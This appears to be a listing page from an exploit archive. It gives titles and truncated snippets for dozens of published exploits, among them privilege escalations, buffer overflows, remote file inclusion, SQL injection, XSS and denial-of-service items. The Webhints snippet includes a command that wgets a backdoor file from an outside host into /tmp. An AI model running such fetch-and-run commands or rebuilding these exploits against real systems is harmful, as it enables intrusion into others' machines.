Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (1)

Solaris 10 libnspr - LDPRELOAD Arbitrary File Creation Privilege Escalation 1 !/bin/sh $Id: raptorlibnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $ raptorlibnspr - Solaris 10 libnspr oldschool local root Copyright c 2006 Marco Ivaldi Local exploitation of a design error vulnerability in version 4.6....

n@board 3.1.9e - naboard_pnr.php Remote File Inclusion

n@board 3.1.9e - naboardpnr.php Remote File Inclusion n@board v3.1.9e, 3.1.8cgb ,3.1.8tc skin Remote File Include Vulnerability Turkish Hacker's Discovered By : mdx and TheBatHacker ------------------------------------------------------ Cyber-Warrior TIM Ay ve Y.ld.zlar Geceye Yak...r... the moon...

phpQuiz 0.1 - pagename Remote File Inclusion

phpQuiz 0.1 - pagename Remote File Inclusion SolpotCrew Community phpQuiz v0.01 design and coding byJule Slootbeek pagename Remote File Inclusion Download file : http://www.furor-normannicus.de/phpQuiz/download/phpQuiz.zip Bug Found By :Solpot a.k.a k. Hasibuan 14-09-2006 contact:...

phpBB Shadow Premod 2.7.1 - Remote File Inclusion

phpBB Shadow Premod 2.7.1 - Remote File Inclusion --------------------------------------------------------------------------- Shadow Prémod = 2.7.1 phpbbrootpath Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn...

Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)

Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow 1 / . \ \ \ \ | | / | | | | \ / / /\ \ / \ | \ / / / / 29\08\06 / || / / mm. dM8 YMMMb. dMM8 YMMMMb dMMM' YMMMb dMMMP There are doors I have yet to open YMMM MMM' windows I have yet to look through "MbdMP Going forward may not be...

Integramod Portal 2.x - functions_portal.php Remote File Inclusion

Integramod Portal 2.x - functionsportal.php Remote File Inclusion !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=47 Integramod Portal Copyright...

Fantastic News 2.1.3 - script_path Remote File Inclusion

Fantastic News 2.1.3 - scriptpath Remote File Inclusion ============================================================================================== Fantastic News = v2.1.3 CONFIGscriptpath Remote File Inclusion Exploit...

Cheese Tracker 0.9.9 - Local Buffer Overflow

Cheese Tracker 0.9.9 - Local Buffer Overflow / by Luigi Auriemma / include include include include define VER "0.1" define CPOS 243 // reader.getfilepos-pcpos define JUNKSZ 500 + CPOS // Uint8 junkbuster500 define OVERFLOW 740 // overflow define BOFSZNUM JUNKSZ + OVERFLOW define BOFSZ JUNKSZ +...

Sendmail 8.13.5 - Remote Signal Handling (PoC)

Sendmail 8.13.5 - Remote Signal Handling PoC !/usr/bin/env python [email protected] Sendmail 8.13.5 and below Remote Signal Handling exploit usage: rbl4ck-sendmail.py 127.0.0.1 0 25 this exploit was leaked to the PHC Phrack High Council so instead of only letting them have a copy, we figu...

RsGallery2 1.11.2 - rsgallery.html.php File Inclusion

RsGallery2 1.11.2 - rsgallery.html.php File Inclusion RsGallery2 for Joomla --------------------------------------------------------------------------- Discovered: marriottvn Remote : Yes Level : High --------------------------------------------------------------------------- Affected software...

Fenice Oms 1.10 - GET Remote Buffer Overflow

Fenice Oms 1.10 - GET Remote Buffer Overflow / IHS Iran Homeland Security public source code Fenice - Open Media Streaming Server remote BOF exploit author : c0d3r "kaveh razavi" [email protected] package : fenice-1.10.tar.gz and prolly prior versions workaround : update after patch release...

Linux Kernel 2.6.9 2.6.11 (RHEL 4) - SYS_EPoll_Wait Local Integer Overflow Local Privilege Escalation

Linux Kernel 2.6.9 2.6.11 RHEL 4 - SYSEPollWait Local Integer Overflow Local Privilege Escalation / k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 Discovered and original exploit coded Jan 2005 by sd Modified 2005/9 by alert7 XFOCUS Security Team http://www.xfocus.org gcc -o k-ra...

Eudora Qualcomm WorldMail 3.0 - IMAPd Remote Overflow

Eudora Qualcomm WorldMail 3.0 - IMAPd Remote Overflow !/usr/bin/python PRE AUTHENTICATION Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow. Discovered by Tim Shelton - [email protected] Coded by [email protected] Details: SEH gets overwritten at 970 bytes in the LIS...

PHPX 3.5.x - Admin login.php SQL Injection

PHPX 3.5.x - Admin login.php SQL Injection source: https://www.securityfocus.com/bid/15680/info PHPX is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation coul...

Noahs Classifieds 1.3 - index.php Cross-Site Scripting

Noahs Classifieds 1.3 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/14835/info Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage thi...

Webhints 1.03 - Remote Command Execution (Perl) (1)

Webhints 1.03 - Remote Command Execution Perl 1 This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR:...

MidiCart PHP - Item_List.php?SecondGroup SQL Injection

MidiCart PHP - ItemList.php?SecondGroup SQL Injection source: https://www.securityfocus.com/bid/13514/info MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacke...

CA License Server - GETCONFIG Remote Buffer Overflow

CA License Server - GETCONFIG Remote Buffer Overflow / Computer-Associates, License Service Stack Overflow Homepage: ca.com Affected version: v1.61 and below in eTrust, Unicenter, BrightStor, etc.. Patched version: hotfix Link: ca.com Date: 04 March 2005 Application Risk: Tsunami Internet Risk:...

Star Wars Battlefront 1.1 - Fake Players Denial of Service

Star Wars Battlefront 1.1 - Fake Players Denial of Service / Copyright 2004 Luigi Auriemma This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at...

U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service

U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service source: https://www.securityfocus.com/bid/10840/info The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server. When malicious requests are received b...

PostNuke 0.726 Phoenix - Multiple Vulnerabilities

PostNuke 0.726 Phoenix - Multiple Vulnerabilities PostNuke Multiple Vulnerabilities Vendor: PostNuke Product: PostNuke Version: CODE VLID = Should be the valid id number of a file for download. CODE = Any script or HTML etc. Solution: An update has been released regarding the SQL Injection...

Microsoft WordPerfect Document Converter (Windows NT4 Workstation SP5SP6 French) - File Template Buffer Overflow (MS03-036)

Microsoft WordPerfect Document Converter Windows NT4 Workstation SP5SP6 French - File Template Buffer Overflow MS03-036 // / Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036 / / / / Exploit with several targets / / / / Find your own return address with : / / findhex dllna...

Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error (4)

Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error 4 // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...

Apache 1.x2.0.x - Chunked-Encoding Memory Corruption (1)

Apache 1.x2.0.x - Chunked-Encoding Memory Corruption 1 // source: https://www.securityfocus.com/bid/5033/info When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper signed interpretatio...

SuSE Linux 6.47.07.17.2 Berkeley Parallel Make - Local Buffer Overflow

SuSE Linux 6.47.07.17.2 Berkeley Parallel Make - Local Buffer Overflow // source: https://www.securityfocus.com/bid/3573/info Parallel Make pmake is a freely available version of the make program, originally distributed with Berkeley Unix. It is designed to execute Makefiles and build programs...

HP-UX 11.0 - SWVerify Buffer Overflow

HP-UX 11.0 - SWVerify Buffer Overflow // source: https://www.securityfocus.com/bid/3279/info HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems. A problem has been discovered in the...

Microsoft Internet Explorer 345 Netscape Communicator 4 - IMG Tag Denial of Service

Microsoft Internet Explorer 345 Netscape Communicator 4 - IMG Tag Denial of Service source: https://www.securityfocus.com/bid/3122/info An issue which affects users of multiple web browsers on Microsoft Windows platforms has been discovered. Multiple malicious IMG tags may cause a denial of...

Solaris 78 - kcms_configure Command-Line Buffer Overflow (2)

Solaris 78 - kcmsconfigure Command-Line Buffer Overflow 2 // source: https://www.securityfocus.com/bid/2558/info The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcmsconfigure, a part of KCMS, is vulnerable to a buffer overflow...

Cisco IOS 11.x12.x - HTTP %%

Cisco IOS 11.x12.x - HTTP %% source: https://www.securityfocus.com/bid/1154/info A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user c...

FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service (5)

FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service 5 / source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and...

ATutor 2.2.4 - id SQL Injection

ATutor 2.2.4 - id SQL Injection Exploit Title: ATutor 2.2.4 - 'id' SQL Injection Date: 2020-02-23 Exploit Author: Andrey Stoykov Vendor Homepage: https://atutor.github.io/ Software Link: https://sourceforge.net/projects/atutor/files/latest/download Version: ATutor 2.2.4 Tested on: LAMP on Ubuntu...

ExpertGPS 6.38 - XML External Entity Injection

ExpertGPS 6.38 - XML External Entity Injection + Exploit Title: ExpertGPS 6.38 - XML External Entity Injection + Date: 2019-12-07 + Exploit Author: Trent Gordon + Vendor Homepage: https://www.topografix.com/ + Software Link: http://download.expertgps.com/SetupExpertGPS.exe + Disclosed at: 7FEB202...

Online Job Portal 1.0 - user_email SQL Injection

Online Job Portal 1.0 - useremail SQL Injection Exploit Title: Online Job Portal 1.0 - 'useremail' SQL Injection Dork: N/A Date: 2020-02-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...

piSignage 2.6.4 - Directory Traversal

piSignage 2.6.4 - Directory Traversal Exploit Title: piSignage 2.6.4 - Directory Traversal Date: 2019-11-13 Exploit Author: JunYeong Ko Vendor Homepage: https://pisignage.com/ Version: piSignage before 2.6.4 Tested on: piSignage before 2.6.4 CVE : CVE-2019-20354 Summary: The web application...

Small CRM 2.0 - Authentication Bypass

Small CRM 2.0 - Authentication Bypass Exploit Title: Small CRM 2.0 - Authentication Bypass Google Dork: N/A Date: 2020-01-02 Exploit Author: FULLSHADE Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/small-crm-php/ Version: V2.0 Tested on: Windows CVE : N/A...

FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)

FTPGetter Professional 5.97.0.223 - Denial of Service PoC Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service PoC Google Dork: N/A Date: 2020-01-03 Exploit Author: FULLSHADE Vendor Homepage: https://www.ftpgetter.com/ Software Link: https://www.ftpgetter.com/ftpgetterprosetup.exe...

NextVPN v4.10 - Insecure File Permissions

NextVPN v4.10 - Insecure File Permissions Exploit Title: NextVPN v4.10 - Insecure File Permissions Date: 2019-12-23 Exploit Author: SajjadBnd Contact: [email protected] Vendor Homepage: https://vm3max.site Software Link:http://dl.spacevm.com/NextVPNSetup-v4.10.exe Version: 4.10 Tested on: Win10...

AVE DOMINAplus 1.10.x - Credential Disclosure

AVE DOMINAplus 1.10.x - Credential Disclosure Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure Date: 2019-12-30 Author: LiquidWorm Vendor: AVE S.p.A. Product web page: https://www.ave.it | https://www.domoticaplus.it Affected version: Web Server Code 53AB-WBS - 1.10.62 Advisory ID:...

FreeSWITCH 1.10.1 - Command Execution

FreeSWITCH 1.10.1 - Command Execution Exploit Title: FreeSWITCH 1.10.1 - Command Execution Date: 2019-12-19 Exploit Author: 1F98D Vendor Homepage: https://freeswitch.com/ Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi Version: 1.10.1 Tested on:...

Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution

Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution Exploit Title: Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution Google Dork: N/A Date: 2019-12-06 Exploit Author: Hodorsec Vendor Homepage: http://www.yachtcontrol.nl/en/ Version: 1.0 Software Link:...

Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting

Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting Exploit Title : Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting Exploit Author : omurugur Software link: https://www.oracle.com/tr/applications/siebel/ Effective version : Oracle Siebel Sales 8.1 CVE: N/A Examples Request; POST...

Verot 2.0.3 - Remote Code Execution

Verot 2.0.3 - Remote Code Execution Exploit Title: Verot 2.0.3 - Remote Code Execution Date: 2019-12-05 Exploit Author: Jinny Ramsmark Vendor Homepage: https://www.verot.net/phpclassupload.htm Software Link: https://github.com/verot/class.upload.php Version: '; $quality = "85"; $baseurl =...

ipPulse 1.92 - Enter Key Denial of Service (PoC)

ipPulse 1.92 - Enter Key Denial of Service PoC Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service PoC Discovery by: Diego Buztamante Discovery Date: 2019-11-18 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link : http://download.netscantools.com/ipls192.zip Test...

Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)

Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow SEH Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow SEH Date: 2019-11-09 Exploit Author: Samir sanchez garnica @sasaga92 Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ecidx1=P610 Softwar...

iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address

iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address During processing of incoming iMessages, attacker controlled data is deserialized using the NSUnarchiver API. One of the classes that is allowed to be decoded from the incoming data is NSDictionary...

Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path

Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path Date: 2019-11-07 Exploit Author: Héctor Gabriel Chimecatl Hernández Vendor Homepage: https://www.alps.com/e/ Software Link:...

Joomla! 3.4.6 - Remote Code Execution

Joomla! 3.4.6 - Remote Code Execution Exploit Title: Joomla! 3.4.6 - Remote Code Execution Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0.0 -- 3.4.6 Tested on:...

X.Org X Server 1.20.4 - Local Stack Overflow

X.Org X Server 1.20.4 - Local Stack Overflow Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow Date: 2019-10-16 Exploit Author: Marcelo Vázquez aka s4vitar Vendor Homepage: https://www.x.org/ Version: = 1.20.4 Tested on: Linux CVE: CVE-2019-17624 !/usr/bin/python coding: utf-8 Author:...

TP-Link TL-WR1043ND 2 - Authentication Bypass

TP-Link TL-WR1043ND 2 - Authentication Bypass Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass Date: 2019-06-20 Exploit Author: Uriel Kosayev Vendor Homepage: https://www.tp-link.com Version: TL-WR1043ND V2 Tested on: TL-WR1043ND V2 CVE : CVE-2019-6971 CVE Link:...

Subrion 4.2.1 - Email Persistant Cross-Site Scripting

Subrion 4.2.1 - Email Persistant Cross-Site Scripting Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting Date: 2019-10-07 Author: Min Ko Ko Creatigon Vendor Homepage: https://subrion.org/ CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225 Website : https://l33thacker.com Descriptio...